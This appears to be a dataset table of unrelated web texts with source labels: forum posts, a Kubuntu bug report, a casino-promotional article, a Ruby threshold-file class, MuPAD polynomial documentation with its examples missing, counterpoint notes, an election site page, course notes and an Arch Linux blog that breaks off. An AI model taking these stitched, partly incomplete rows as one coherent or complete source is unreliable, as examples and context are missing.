| Document (string, 395–24.5k chars) | Source (string, 6 classes) |
|---|---|
Have been playing around with the Volt Framework a bit, which is great, but it upset me that there was no HAML support, so I added that in.
Well, I keep pushing back the release by one week, and another, and another, because I want it to be perfect when I show it to the world, complete with a super-awesome suite of tests and the most comprehensive documentation in the history of documentation. But the truth is, I’m building this library more to scratch my own itch than anything else, and making it public so that if someone finds it useful, they may use it, and/or contribute back. So here goes:
I probably should post this as a post by itself, so it can appropriately get upvoted/downvoted/ignored. :P
This is my code generator. It grabs the schema from a mysql db, generates db code, http handlers, and a main package that ties them all together. The goal is to keep the schema in the database, along with constraints (this will work wayyyy better with Postgresql). For now I have code that checks against “not null” constraints. Badly, too. There’s a lot of ugly stuff in there. Oh my god, why am I clicking Post.
This is awesome! It’s rough for sure, but it’s a great way to get some code started, then trim out what you don’t need. Agreed, immediately useful.
This is cool, I like it a lot!
You could chain it to my equally-if-not-more sketchy automatic API documentation generator and truly make skynet https://github.com/dangerousbeans/doc_smoosher
I don’t know if that changes anything for you, but I generate a swagger (http://swagger.io/) file to describe the API. A friend of mine has convinced me that I need to do something about json-ld, and maybe have hydra baked in too. That’s not done yet; I still have a few concepts to wrap my head around before I start on these. XD
It has some rough edges, but is immediately useful for me, thanks. You looking for contributions or just a solo project?
Super glad it’s useful, all contributions welcome. Sorry I’m not hosting on github, I hear it’s appreciated for pull requests, it’s probably something I should consider? Again, glad it’s found some use for someone!
Github might be better for mass adoption, but I honestly don’t care, never used Gogs before – already filed a bug. Working with a very dumb DB with column names like type and so forth.
I have wanted this exact tool and just didn’t get started on it.
Pull requests aren’t a silver bullet. You could have a clone on github and see if you like what you get with pull requests. Not everyone does.
I have actually never used the native pull-request system built into git – good excuse to use it.
|
OPCFW_CODE
|
[Bug 189113] [NEW] restricted-extras install ruins fresh install of kubuntu but works well in ubuntu
ajeannotte at yahoo.com
Tue Feb 5 00:36:07 UTC 2008
Public bug reported:
i've had Ubuntu running on my 2 home PCs for 6-8 months now. for kicks,
i thought i'd give Kubuntu a go since i use a lot of their programs
(amarok, k3b, ktorrent, etc...)
after installation i install my favorite programs (nvidia driver, vlc) and the restricted extras. i've pretty much got my system down for a fresh install since i do them a lot; i like to play around with things. never had a problem with Ubuntu.
as soon as i install the ubuntu-restricted-extras package, it blows up. the package manager gives me an error message about not being traceable... or something close to that (i'm not in front of it right now)... and when i try to open the package manager again (or apt-get) it tells me that it's already in use. even after i reboot it's still in conflict.
if i try to have it resolve it's own conflict it blows up again.
so far the things i've tried are:
- 5 or so fresh installs (at least)
- installing restricted extras first
- updating system first
- tried both ubuntu-restricted-extras and kubuntu-restricted-extras
- used 'top' to try to find which processes are active and killing them
- tried it on both computers
- AMD 5600+ X2 / nvidia 7900 GT
- AMD 4200+ X2 / nvidia 8500
i'm buggered. this problem is past my limit of usefulness.
right now i've got it installed on a separate partition with all my favorites: amarok with mp3 support, vlc playing all the video formats i need (haven't found any video it won't play yet), and firefox with flash, but i did it without using the restricted extras package.
i suppose i really don't need help as it's running, but it would be nice
if i could just go to the restricted-extras and have it not ruin my
fresh install. if i didn't have as much spare time as i do right now i'd
have given up on kubuntu without even giving it a try.
** Affects: kubuntu-restricted-extras (Ubuntu)
restricted-extras install ruins fresh install of kubuntu but works well in ubuntu
|
OPCFW_CODE
|
The impact of artificial intelligence (AI) in Lucky Cola game testing can be significant, revolutionizing the way games are developed, tested, and improved. AI technologies can streamline and enhance various aspects of game testing, leading to better user experiences and more efficient game development processes. Here’s an explanation of how AI can influence game testing in an online casino context:
1. **Automated Testing:** AI-powered automation tools can simulate player interactions and test various game scenarios automatically. This helps identify bugs, glitches, and inconsistencies much faster than manual testing. Automated testing also ensures that different parts of the game are thoroughly examined, reducing the risk of overlooking issues.
2. **Performance Testing:** AI can simulate a large number of players accessing the game simultaneously, testing its performance under stress conditions. This helps ensure that the game’s servers can handle the expected load during peak times without crashes or slowdowns.
3. **Behavior Analysis:** AI can analyze player behavior within the game, identifying patterns and anomalies that might indicate cheating or suspicious activities. This is particularly relevant in online casino games to maintain fair play and security.
4. **Quality Assurance:** AI algorithms can assess the quality of the game by comparing it to established benchmarks or standards. This helps ensure that the game meets expected levels of graphical quality, gameplay mechanics, and overall user experience.
5. **Bug Detection and Prevention:** AI can learn from previous testing cycles and identify common patterns associated with bugs or glitches. As a result, it becomes better at predicting potential issues in new game versions and helps developers prevent the recurrence of known problems.
6. **Personalization Testing:** In games that offer personalized experiences, AI can simulate various player profiles and preferences to test how well the game adapts and provides a tailored experience to different types of players.
7. **Regression Testing:** Whenever updates or changes are made to a game, AI can help automate regression testing, ensuring that new updates don’t inadvertently introduce new bugs or problems into previously resolved areas of the game.
8. **Balancing and Fairness:** AI can simulate different scenarios and assess game balance and fairness. This is especially important in online casino games, where the odds and outcomes need to be carefully calibrated to ensure fair gameplay (a simplified fairness check is sketched in code after this list).
9. **Speed and Efficiency:** AI-powered testing tools can significantly accelerate the testing process, reducing the time it takes to identify and fix issues. This expedites game development cycles and allows for quicker release of updates and new features.
10. **User Feedback Analysis:** AI can process user feedback and reviews to identify recurring issues or suggestions. This feedback-driven approach helps developers prioritize improvements that directly impact player satisfaction.
11. **Continuous Improvement:** Over time, AI systems can learn from testing data and player behavior to provide insights that contribute to continuous game improvement. This feedback loop can lead to a more engaging and enjoyable player experience.
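As a concrete illustration of point 8 above, here is a minimal Python sketch (the game, paytable, and numbers are entirely hypothetical, not Lucky Cola's actual code) that simulates a large number of rounds and checks that the measured return-to-player (RTP) stays near its design target:

    import random

    def spin(rng):
        """Toy slot round: payout for a 1-credit bet under a made-up paytable."""
        r = rng.random()
        if r < 0.001:
            return 500  # jackpot
        if r < 0.05:
            return 5
        if r < 0.30:
            return 1
        return 0

    def measured_rtp(n_rounds, seed=42):
        rng = random.Random(seed)
        return sum(spin(rng) for _ in range(n_rounds)) / n_rounds

    # Design RTP for this paytable: 0.001*500 + 0.049*5 + 0.25*1 = 0.995
    rtp = measured_rtp(1_000_000)
    assert abs(rtp - 0.995) < 0.05, f"RTP drifted from its target: {rtp:.3f}"

A real test suite would run many seeds and tighter statistical bounds, but the structure, simulate at scale and compare against the designed odds, is the core idea.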
While AI offers numerous benefits to game testing, it’s important to note that it’s not a complete replacement for human testers. Human testers provide valuable insights into subjective experiences and unexpected scenarios that AI might not be able to capture. A balanced approach that combines AI-driven automation with human expertise is often the most effective way to ensure high-quality game testing in online casinos like Lucky Cola.
|
OPCFW_CODE
|
Following on from Fifth Species in two parts, Fux continues by going through all five species in three parts, and then four, against a cantus firmus. You will find those sections in Mann's translation (The Study of Counterpoint).
The next section of Gradus is in Mann's The Study of Fugue. At this point Fux's original text includes a "brief explanation of the use of suspensions in free writing"; for some reason Mann does not include this in his translation. Therefore I'll look at some examples and offer my interpretation of what may be going on.
The above extracts show "percussed" dissonances which we can identify as accented passing notes. In the first two the discord is a second above the lower note falling to a unison (f to e, and a to g), and in the third extract the discord is a compound second falling to an octave. In all three cases the upper note steps up again to form a discord which is resolved when the suspended lower note falls in the usual manner.
In these three extracts the dissonant passing note in the lower voice is a 7th falling to an 8ve. Again the note steps back up to form a discord which is resolved when the other (suspended) voice falls by step. In the second and third extracts we also see the accented passing note in the upper voice as used in the first examples.
These two extracts show a 4th used as an accented passing note. In contrast to the previous examples, these two show the melodic movement continuing down rather than stepping back up. Note that in all but one of the 8 extracts above the suspension has been approached by leap from below.
Infrequently, Fux uses the accented passing notes without a suspension. The second example in this group is the only one we've seen in which the accented passing note is in an ascending line.
Finally, here is the first two-part fugue from Gradus. The new points to note are:
The next chapters of Gradus which are included in Mann's The Study of Fugue cover fugue in three & four parts, and double (invertible) counterpoint at the octave, tenth, and twelfth. The final fugues show the use of two or three subjects.
Mann's book includes sizeable chunks from texts by Marpurg, Albrechtsberger (who taught Beethoven), and Martini (who taught J.C.Bach and Mozart). These are superb works with wonderful examples; for instance Albrechtsberger's text includes a number of canons and riddle canons by Palestrina, Mozart, and others.
Please contact me with any comments, corrections, or suggestions for additional material about these web pages.
Please link to the main page; this will increase the pages' ranking on the search engines.
Contact me if you want to be included on my links page, or wish to suggest appropriate links.
You can help to encourage ongoing development of the pages and the applets by purchasing something you need from the affiliate links, or by a donation.
All the music examples on this page were drawn using Lilypond.
|
OPCFW_CODE
|
require 'forwardable'
require 'digest'

module Threshold
class InvalidThresholdsObject < StandardError; end
class ReadOnlyThresholdFile < StandardError; end
class NonExistantThresholdFile < StandardError; end
class MissingThresholdFileConfiguration < StandardError; end
class ThresholdAtomicLockFailure < StandardError; end
class Thresholds
extend Forwardable
attr_accessor :file, :readonly
def_delegators :@thresholds, :<<, :length, :push, :pop, :first, :last, :<=>, :==, :clear, :[], :[]=, :shift, :unshift, :each, :sort!, :shuffle!, :collect!, :map!, :reject!, :delete_if, :select!, :keep_if, :index, :include?
def initialize(thresholds = [])
@thresholds = thresholds
end
# Write changes to the file
def flush
begin
valid_existing_file?(@file)
raise ReadOnlyThresholdFile if @readonly
# Detect out-of-band changes before truncating the file.
raise ThresholdAtomicLockFailure, 'The @file state/hash changed before we could flush the file' unless stored_hash == current_hash
file = File.open(@file, 'w+')
file.write self.sort.to_s
file.close
rescue NonExistantThresholdFile
raise ReadOnlyThresholdFile if @readonly
file = File.open(@file, 'w')
file.write self.sort.to_s
file.close
end
self.stored_hash = current_hash
return true
end
# Clears the current collection and reads in the thresholds.conf file
def loadfile!
@thresholds.clear
loadfile
end
# Appends the thresholds.conf file's entries to the current collection
def loadfile
valid_existing_file?(@file)
results = Threshold::Parser.new(@file)
@stored_hash = results.filehash
results.caps.each do |result|
builder = Threshold::Builder.new(result)
self << builder.build
end
end
# Check if all objects in the Threshold Instance report .valid?
def valid?
begin
self.each do |threshold|
if threshold.respond_to?(:valid?)
return false unless threshold.valid?
else
raise InvalidThresholdsObject, "Container object has unknown objects"
end
end
return true
rescue InvalidThresholdsObject
return false
end
end
# Printer.
# Pass true to to_s to skip printing InternalObjects.comment.
def to_s(skip = false)
output = ""
raise InvalidThresholdsObject, "Container object has unknown objects" unless valid?
self.each do |threshold|
output << threshold.to_s(skip) + "\n"
end
return output
end
# The calculated hash of the threshold.conf file at load time.
def stored_hash
@stored_hash
end
def to_a
@thresholds
end
## Forwardable corrections:
## These methods are implemented by hand because the core Array methods return new Arrays.
# Array#sort etc. create a new Array, so direct Forwardable delegation would hand back an Array rather than a Thresholds object.
# Returns a new Threshold Object
def sort
Thresholds.new(@thresholds.sort)
end
# Returns a new Threshold Object
def reverse
Thresholds.new(@thresholds.reverse)
end
# Returns a new Threshold Object
def shuffle
Thresholds.new(@thresholds.shuffle)
end
# Returns a new Threshold Object
def reject(&blk)
if block_given?
Thresholds.new(@thresholds.reject(&blk))
else
Thresholds.new(@thresholds.reject)
end
end
# Returns a new Threshold Object
def select(&blk)
if block_given?
Thresholds.new(@thresholds.select(&blk))
else
Thresholds.new(@thresholds.select)
end
end
#Uniques by default to printable output
# Returns a new Threshold Object
def uniq(&blk)
if block_given?
Thresholds.new(@thresholds.uniq(&blk))
else
Thresholds.new(@thresholds.uniq{ |lineitem| lineitem.to_s(true) })
end
end
## Complex SET Methods
## & (intersection), | (union), + (concatenation), - (difference)
# + (concat)
# Returns a new Threshold Object
def +(an0ther)
Thresholds.new(@thresholds + an0ther.to_a)
end
# | (union)
# Returns a new Threshold Object
def |(an0ther)
Thresholds.new(@thresholds | an0ther.to_a)
end
# & (intersection)
# Returns a new Threshold Object
def &(an0ther)
Thresholds.new(@thresholds & an0ther.to_a)
end
# - (Difference)
# Returns a new Threshold Object
def -(an0ther)
Thresholds.new(@thresholds - an0ther.to_a)
end
# Returns a new Threshold Object with just suppressions
def suppressions(&blk)
if block_given?
self.suppressions.select(&blk)
else
Thresholds.new(@thresholds.select{|t| t.class.to_s == "Threshold::Suppression"})
end
end
# Returns a new Threshold Object with just event_filters
def event_filters(&blk)
if block_given?
self.event_filters.select(&blk)
else
Thresholds.new(@thresholds.select{|t| t.class.to_s == "Threshold::EventFilter"})
end
end
# Returns a new Threshold Object with just rate_filters
def rate_filters(&blk)
if block_given?
self.rate_filters.select(&blk)
else
Thresholds.new(@thresholds.select{|t| t.class.to_s == "Threshold::RateFilter"})
end
end
private
def stored_hash=(foo)
@stored_hash=foo
end
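# Hashes the file contents while holding an exclusive lock, so that
# concurrent writers are serialized and flush can detect changes.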
def current_hash
file = File.open(@file, 'rb+')
file.flock(File::LOCK_EX)
hash = Digest::MD5.file @file
file.close
return hash
end
def valid_existing_file?(file)
raise MissingThresholdFileConfiguration, "Missing threshold.conf path. See README for Usage." if file.nil?
raise NonExistantThresholdFile, "Missing threshold.conf" unless File.file?(file)
return true
end
end
end
|
STACK_EDU
|
I am trying to use the NCS to run some low-level TensorFlow code (i.e., not train a NN but use TF's algebraic operations directly). As a simplified example of what I would eventually like to do, I have written Python code to create a TF graph that computes the number of iterations for a given point in the Mandelbrot set (code here: https://gist.github.com/riccardomurri/c293abc5a51a39a50512779dca72c727 )
Now the code runs correctly in TF on my laptop, but both mvNCCheck and mvNCCompile fail with the same error:
$ mvNCCheck -in IN:0 -on OUT mandelbrot.meta
... (Python deprecation warnings removed) ...
mvNCCheck v02.00, Copyright @ Intel Corporation 2017
... (Python deprecation warnings removed) ...
Traceback (most recent call last):
  File "/usr/local/lib/python3.6/dist-packages/tensorflow/python/client/session.py", line 1327, in _do_call
    return fn(*args)
  File "/usr/local/lib/python3.6/dist-packages/tensorflow/python/client/session.py", line 1312, in _run_fn
    options, feed_dict, fetch_list, target_list, run_metadata)
  File "/usr/local/lib/python3.6/dist-packages/tensorflow/python/client/session.py", line 1420, in _call_tf_sessionrun
    status, run_metadata)
  File "/usr/local/lib/python3.6/dist-packages/tensorflow/python/framework/errors_impl.py", line 516, in __exit__
    c_api.TF_GetCode(self.status.status))
tensorflow.python.framework.errors_impl.NotFoundError: Unsuccessful TensorSliceReader constructor: Failed to find any matching files for mandelbrot
  [[Node: save/RestoreV2 = RestoreV2[dtypes=[DT_INT32, DT_FLOAT, DT_FLOAT], _device="/job:localhost/replica:0/task:0/device:CPU:0"](_arg_save/Const_0_0, save/RestoreV2/tensor_names, save/RestoreV2/shape_and_slices)]]
The mandelbrot.meta file is there and can be correctly read (and the graph computed) by the mandelbrot_r.py program (link to code above). What am I doing wrong?
@riccardomurri When using the NCSDK with a TensorFlow model, the NCSDK expects either a pb file or a meta file, a data file and an index file. If you're using a meta file, make sure your data and index file are named with the same prefix. It looks like you may be missing those files (data and/or index) or they may be named differently from your meta file.
Hello @Tome_at_Intel, many many thanks for this explanation! One further question: what should be in the data and index files? (Or equivalently, how do I produce the combined .pb file?) When using TF's own import_meta_graph, everything works fine on my laptop…
@riccardomurri You're welcome. This Stackoverflow.com answer by T.K Bartel and trdgny may be helpful to you: https://stackoverflow.com/questions/41265035/tensorflow-why-there-are-3-files-after-saving-the-model. Summarizing the answer: you need to import the meta graph and re-save it. Try using the following code and let me know if it works for you.
with tf.Session() as sess:
    saver = tf.train.import_meta_graph(YOUR META GRAPH FILE HERE)
    save_path = saver.save(sess, "/tmp/model.ckpt")
    print("Model saved in file: %s" % save_path)
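(A side note beyond the quoted answer: if the graph has no trained weights worth preserving, as in this pure-computation Mandelbrot example, you could also try freezing it straight to a single .pb file. The sketch below assumes TF 1.x and that the output node is named OUT, as in the mvNCCheck invocation above; treat it as untested.)

    import tensorflow as tf

    with tf.Session() as sess:
        saver = tf.train.import_meta_graph("mandelbrot.meta")
        sess.run(tf.global_variables_initializer())  # nothing to restore from a checkpoint
        # Bake the (initialized) variables into constants and write one .pb file.
        frozen = tf.graph_util.convert_variables_to_constants(
            sess, sess.graph_def, ["OUT"])
        tf.train.write_graph(frozen, ".", "mandelbrot.pb", as_text=False)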
|
OPCFW_CODE
|
Domains of univariate polynomials
Dom::UnivariatePolynomial(<Var, <R, <Order>>>)
Dom::UnivariatePolynomial(Var, R, Order)(p)
Dom::UnivariatePolynomial(Var, R, Order)(lm)
Dom::UnivariatePolynomial(Var, R, ..) creates the domain of univariate polynomials in the variable Var over the commutative ring R.
Dom::UnivariatePolynomial represents univariate polynomials over arbitrary commutative rings.
All usual algebraic and arithmetical polynomial operations are implemented, including Gröbner basis computations.
Dom::UnivariatePolynomial(Var, R, Order) creates a domain of univariate polynomials in the variable Var over a domain of category Cat::CommutativeRing in sparse representation with respect to the monomial ordering Order.
Dom::UnivariatePolynomial() creates the univariate polynomial domain in the variable x over the domain Dom::ExpressionField(normal) with respect to the lexicographic monomial ordering.
Dom::UnivariatePolynomial(Var) creates the univariate polynomial domain in the variable Var over the domain Dom::ExpressionField(normal) with respect to the lexicographic monomial ordering.
Note: Only commutative coefficient rings of type DOM_DOMAIN which inherit from Dom::BaseDomain are allowed. If R is of type DOM_DOMAIN but does not inherit from Dom::BaseDomain, the domain Dom::ExpressionField(normal) will be used instead.
For this domain only identifiers are valid variables.
Note: It is highly recommended to use only coefficient rings with unique zero representation. Otherwise it may happen that, e.g., a polynomial division will not terminate or a wrong degree will be returned.
Please note that for reasons of efficiency not all methods check their arguments, not even at the interactive level. In particular this is true for many access methods, converting methods and technical methods. Therefore, using these methods inappropriately may result in strange error messages.
To create the ring of univariate polynomials in x over the integers one may define
Now, let us create two univariate polynomials.
The usual arithmetical operations for polynomials are available:
The leading coefficient, leading term, leading monomial and reductum of a are
and a is of degree
The method gcd computes the greatest common divisor of two polynomials
and lcm the least common multiple:
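As a small worked illustration (this is the underlying algebra, not the elided MuPAD output): over the integers, gcd(x^2 - 1, x^2 - 2*x + 1) = x - 1, and lcm(x^2 - 1, x^2 - 2*x + 1) = (x - 1)^2*(x + 1) = x^3 - x^2 - x + 1, i.e. the product of the two polynomials divided by their gcd.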
Computing the definite and indefinite integral of a polynomial is also possible,
which, in the case of indefinite integration, is simply the antiderivative of the polynomial.
But, since for representing the indefinite integral of a the coefficient ring chosen as the integers is not appropriate, the polynomial ring over its quotient field is used instead.
Furthermore, the polynomials may be interpreted as polynomial functions by applying them to coefficient ring elements, to polynomials of this domain, or to arbitrary expressions (with option Expr):
To get a vector of coefficients of a polynomial, which gives the dense representation of it, one may use the method vectorize.
An indeterminate given by an identifier; default is x.
A commutative ring, i.e. a domain of category Cat::CommutativeRing; default is Dom::ExpressionField(normal).
A monomial ordering, i.e. one of the predefined orderings LexOrder, DegreeOrder or DegInvLexOrder or an element of domain Dom::MonomOrdering; default is LexOrder.
A polynomial or a polynomial expression.
List of monomials, which are represented as lists containing the coefficients together with the exponents or exponent vectors.
The characteristic of this domain.
The coefficient ring of this domain as defined by the parameter R.
The name of the domain created.
The neutral element w.r.t. "_mult".
The monomial order as defined by the parameter Order.
The list of the variable as defined by the parameter Var.
The neutral element w.r.t. "_plus".
coeff(a, Var, n)
coeff(a, Var, n) returns the coefficient of the term Var^n as an element of R.
coeff(a, n) returns the coefficient of the term Var^n as an element of R.
This method overloads the function coeff for polynomials.
|
OPCFW_CODE
|
The Sub-items setting was added by Notion as a way to better visualize parent-child relationships, allowing you to display your entries in a tiered structure for the following views.
As many of our templates contain databases with existing Parent Item → Sub-Item relations, we’ve put together a handy guide on how to enable this feature for any supported view in your system. Try it out in any of the following templates:
- Ultimate Tasks
- Ultimate Brain
- Creator’s Companion (Ultimate Tasks Edition)
For this example, we’ll be enabling sub-items for the Timeline View, as it is found in all of the templates mentioned above. The location of this page will differ depending on the template being used, so check for your template type in the toggle below.
Timeline View Locations
- Views (Toggle) → Timeline View
Ultimate Brain, Ultimate Brain + Creator’s Companion
- Task Manager → Quick Links (Toggle) → Page Links (Toggle) → Timeline View
Creator’s Companion + Ultimate Tasks
- Ultimate Tasks for Creator’s Companion → Views (Toggle) → Timeline View
Once on this page, click the ellipsis icon ••• to the left of the blue New button to open the View options panel, and then select the Sub-items option.
In this menu you’ll have the option to use an existing relation or create a new one. As the All Tasks database already contains a Parent Task → Sub-Tasks relation, you can click Property under Use an existing relation and then select Sub-Tasks. Here you’ll be given two additional options.
- Set on all new All Tasks views
- Set on this view
For this example’s purposes select the second option, Set on this view.
Success! The view will quickly update to display only top-level tasks, with those containing sub-tasks receiving an arrow icon ► at the far left of the row. Clicking this arrow will display all of the sub-tasks contained within.
Sub-items can be quickly created by clicking a parent task’s New sub-item button.
- Existing parent tasks: these will be shown with a black arrow icon ► at the far left of the row. Clicking this will display all of the sub-tasks and the New sub-item button.
- Regular top-level tasks: while hovering over these, a greyed out version of the arrow icon ► will appear at the far left of the row. Clicking this will display the New sub-item button.
You can also drag and drop pages under existing parent tasks to turn them into sub-items.
In the example shown below, an additional filter of Design has been added to the view. As the parent task does not meet this requirement but has sub-tasks that do, the parent task is shown in a permanently grayed-out and expanded state.
Turning Off Sub-items
If you wish to disable sub-items for a view, or all new views for that database, simply click the ellipsis icon ••• to open the View options panel, then click Sub-items, and then select Turn off sub-items. Here you’ll be given two additional options.
- Turn off for this view
- Turn off for all new views
Things to Note
Previous & Next Page navigation does not work for sub-tasks. When opening a sub-task from a view with sub-items enabled, there will be no Previous or Next Page buttons at the top of the entry, and their keyboard shortcuts will not work.
Database search does not take sub-items into account. Only top-level items are searched; any sub-items matching the term will not be shown.
In table views, a column’s ‘Calculate’ setting does not take into account sub-items. Only top-level items are used when calculating these values.
Sub-item structures do not remember their state and will always close. Unlike toggles, views with sub-items enabled will return to a closed state when you navigate away from a page and then return. Note: Parent tasks will remain expanded if they do not meet a filter’s requirements but have sub-tasks that do.
|
OPCFW_CODE
|
Assembly Election 2022
This website is a clone of the original electionsni.org website, being updated for the Assembly Election 2022 by Callum Ormerod, as the original site is no longer being supported by the NICVA.
Updating this website has been a fairly last-minute endeavour, so please bear with me if there are any problems/issues/delays.
If anyone is attending any of the counts and wishes to help by providing information after each round, please contact me on twitter, or by email (email@example.com)
Full credit to Bob Harper and Brian Cleland for the exceptional initial design of this website and for making it available on Github, so that I'm able to do this.
The Elections NI Open Data project is a collaboration of people who wanted to produce datasets and visualisations of the 2016 Northern Ireland Assembly elections, led by ODI Belfast at NICVA and the NI Open Government Network.
We don't receive funding for the project and we are independent of any political party or candidate. However, we are grateful to NICVA for providing the domain name.
Though we use data produced by the Electoral Office for Northern Ireland, we are not associated with them in any way, and this website does not imply that we (or our data) are endorsed by them.
You can find us on Twitter: @ElectionsNI
If you're observing at a count centre you can help contribute to the live data. This won't take much of your time: just snap a picture of the results board, email or tweet it to us, and we'll update the live results (see the 2011 version). That's it!
It doesn't matter if you're observing as an individual or for a party, you can still help. If you'd like to be involved and contribute to the open database, please get in contact:
You will need to apply for an electoral observer pass from the Electoral Commission by midnight on Tuesday 21 February 2017: click here for details.
The eight count centres are:
- Seven Towers Leisure Centre, Ballymena
- Foyle Area, Derry/Londonderry
- Lagan Valley Leisureplex, Lisburn
- Valley Leisure Centre, Newtownabbey
- Titanic Exhibition Centre, Belfast - We have enough volunteers to cover Belfast. If you're able to help with one of the other locations that would be better. Thanks!
- Banbridge Leisure Centre
- Aurora Leisure Complex, Bangor
- Omagh Leisure Complex
More information about the centres and observing is available on the Electoral Office website.
- Website, framework and visualisations: Bob Harper and Brian Cleland
- Database layout: shared by the Irish Local Government Association (LGMA)
- Count stages visualisation: shared by James Bligh (@anamates) under the Creative Commons Attribution 4.0 International License (originally for Irish GE 2016)
- The icon used on the Twitter account was created by Jonathan Li
We are particularly grateful to those who are giving their time to cover the results at the count centres:
Annamay McNally, Austin Orr, Cliodhna Rae, Colm Burns, David McBurney, Gráinne Walsh, Ryan McAleer, Steve Donnan, Stratagem NI
You can also join the Open Government Network Forum.
|
OPCFW_CODE
|
In 2010, I took over lecturing 8.033, MIT's course on special relativity (SR). It's a bit of an odd element in our undergraduate curriculum, since SR is not really enough by itself to constitute a full semester-long course. I decided to focus on the idea that Lorentz symmetry is the guiding principle of the subject, and showed how by developing a notation that makes incorporating this symmetry "automagic," most of SR can be built up in a fairly straightforward way. The course concludes by discussing (very, very briefly) some of the concepts of general relativity (GR), showing how with the framework we developed for SR, GR doesn't require a very big conceptual leap. (Although, it does require a rather larger leap in terms of the kinds of calculations and computations that need to be done. As a consequence, 8.033 can only scratch the surface of this topic.)
Over the two years that I taught 8.033, I developed a decent set of handwritten notes on the subject, which multiple people have written to ask about. I have accordingly decided to post them on my MIT webpage. Note that Fall 2011 is the last semester I taught this course. I went on sabbatical in Fall 2012, and Peter Fisher took over the lectures; he was followed by Tracy Slatyer. If I had taught the course more, I might have cleaned up the notes some more, perhaps even typed them up. Since I did not, these notes are the best I've got available. They follow the schedule and syllabus of Fall 2011, and likely do not synch up with the schedule of other semesters.
These notes are provided as is; I don't guarantee that they are free of typos or stupid mistakes. Feel free to send me corrections via email. I may post corrections when I have time, but don't hold your breath waiting!
2. Galilean relativity and waves: How the wave equation behaves under a Galilean transformation; electromagnetic waves; failure to find the "ether" in which these waves live; constancy of the speed of light.
3. Lorentz transformations: Consequences of light's constant speed; time dilation and length contraction; the Lorentz transformation (written out for reference after this outline).
4. The geometry of spacetime: How to combine space and time into a single entity in a way that makes sense from the viewpoint of the Lorentz transformation. Invariant intervals; spacelike, timelike, and lightlike separations.
5. Geometric objects in spacetime: 4-vectors and their transformation properties. Introduction to the index notation. Kinematics of moving objects in SR.
6. More kinematics: Velocity addition rule. Conservation of energy and momentum; derivation of E = mc^2.
7. 4-momentum: Unifying momentum and energy into a single spacetime object. Spacetime invariants more generally; 4-velocity (see the reference formulas after this outline).
8. Accelerated motion: The twin paradox, forces.
9. More on forces: Summary of electrodynamics; spacetime tensors.
10. More on tensors: The metric tensor; covariant and contravariant 4-vector components; how this notation allows us to construct invariants and examine how quantities transform between frames easily.
11. More transformation laws: Focus on transformation of electromagnetic fields.
12. Transformation of fields 2: Another way to understand the transformation of electromagnetic fields, focused on the way sources transform.
13. Interlude: Principle of least action, preparing for an introduction to general relativity.
14. Principle of least action: Fermat's principle, Lagrangian mechanics. Constants of the motion.
15. Motion in spacetime: Principle of extremal aging, geodesics. Introduction to field theories.
16. Relativistic field theories: Applying the principles we have learned to build a theory of interactions due to some fundamental field in manner consistent with the requirements of relativity.
17. Gravity 1: The challenges of incorporating relativity into a theory of gravity. First considerations on how to do this.
18. Gravity 2: Further details on making gravity relativistic; the principle of equivalence.
19. Geodesics in curvilinear coordinates: As preparation to modeling trajectories under gravity, first look at trajectories in special relativity, but in complicated coordinate systems.
20. Gravity 3: A cartoon-level overview of where spacetimes that describe gravity come from; some example solutions; motion in these spacetimes. Demonstration that this motion incorporates gravity. Non-Newtonian gravitational effects.
21. Strong gravity: Black holes.
21'. Strong gravity: Some details of the black holes lecture that, for some reason, are in a different PDF file.
22. Cosmology 1: The large-scale structure of our universe. Principles.
22'. Cosmology 1: Some details of the cosmology lecture that, for some reason, are in a different PDF file.
23. Cosmology 2: Our universe, at least as modern observations appear to indicate.
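For quick reference alongside lectures 3 and 7 above, the two standard results those lectures build to, written in conventional notation (the notes' own conventions may differ slightly): for a boost with speed v along x,

x' = gamma (x - v t), t' = gamma (t - v x / c^2), where gamma = 1 / sqrt(1 - v^2 / c^2);

and the invariant built from the 4-momentum, E^2 = (p c)^2 + (m c^2)^2, which reduces to E = m c^2 for a particle at rest.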
|
OPCFW_CODE
|
I will try to explain the issues and problems I have faced while installing Arch, so you can avoid them.
Firstly, I am guessing your device is pretty much new and the hardware you are using is overkill. Mine is average; you can check my specs by clicking here.
Installation process. Yep, pretty much the most frustrating part, right? :)) While there are various guides, video tutorials, and blogs like this one, unfortunately most of them are outdated, as arch is updated quite often, making the whole installation process harder for beginners every day.
After successfully booting up, all of the wifi settings I had configured throughout the installation process were gone. Unfortunately, I did not have any ethernet cable to resolve the issue even temporarily, which pushed me to find a better and more optimal solution, as it was not going to be my last arch installation.
“All men can see the tactics whereby I conquer, but
what none can see is the strategy out of which victory
is evolved.” - Sun Tzu
- While surfing, I came across an amazing, perfect, and insane version called ArchLabs. This literally made my day. A whole arch installation with a terminal-based GUI installer? YESSIR!
“So in war, the way is to avoid what is strong and to
strike at what is weak.” - Sun Tzu
- The line-by-line installation of official arch linux is the strong part in this war, which I had to avoid, so I targeted the archlabs installation instead: burned the .iso directly to my usb, and installed the system by watching the video here.
There was even no need to install any desktop environment, as I had selected one during the installation. The internet connection is stable, as is the desktop environment; both are ready to rumble.
“Victorious warriors win first and then go to war,
while defeated warriors go to war first and then seek to win” - Sun Tzu
- Making sure the system is updated and secure, so no one can vuln me. The general and required installations, such as yay and so on, are also done here.
- Screen brightness being stuck at 0, no existing software to help you to change it at all, no shortcut commands working…
“To know your Enemy, you must become your Enemy.” - Sun Tzu
Exactly: thinking the way arch would think. Maybe rebuilding the kernel with custom commands? No, that could not even make its way to lighting up the screen… intel graphics? No. I cannot run from the fight that easily. As long as I keep thinking, I know I will win it!
Wait, changing the nvidia drivers? Yes! This should be it. But which version, and how, and where?
“Opportunities multiply as they are seized.” - Sun Tzu
- Download and install the headers for your current kernel version:
sudo pacman -S linux-headers # (this will install the headers for the latest kernel version)
- Or head over to https://archive.archlinux.org/packages/l/, download the corresponding linux-headers package manually, and install it by typing
sudo pacman -U linux-headers-x.x.x.tar.xz
Generate the grub config file (if you are using grub):
grub-mkconfig -o /boot/grub/grub.cfg
Before moving further, the nouveau driver needs to be blacklisted, which is done as follows:
- Open blacklist.conf (typically under /etc/modprobe.d/) with any editor
- Add the following line to the end of the file:
options nouveau modeset=0
Here it is. As for nvidia, I had it working on the 460.x series, but which version exactly? One mistake could destroy my whole plan.
Time to prepare the environment to test each of them.
“Let your plans be dark and impenetrable as night, and when you move, fall like a thunderbolt.” - Sun Tzu
A page listing all the previous versions of the nvidia drivers was leaked; time to use it. Click here to get there!
This is the way! The following steps were done to complete the setup of the attack:
sudo pacman -S linux-headers
Almost there! I will upgrade the nvidia driver version just one step up; here we are:
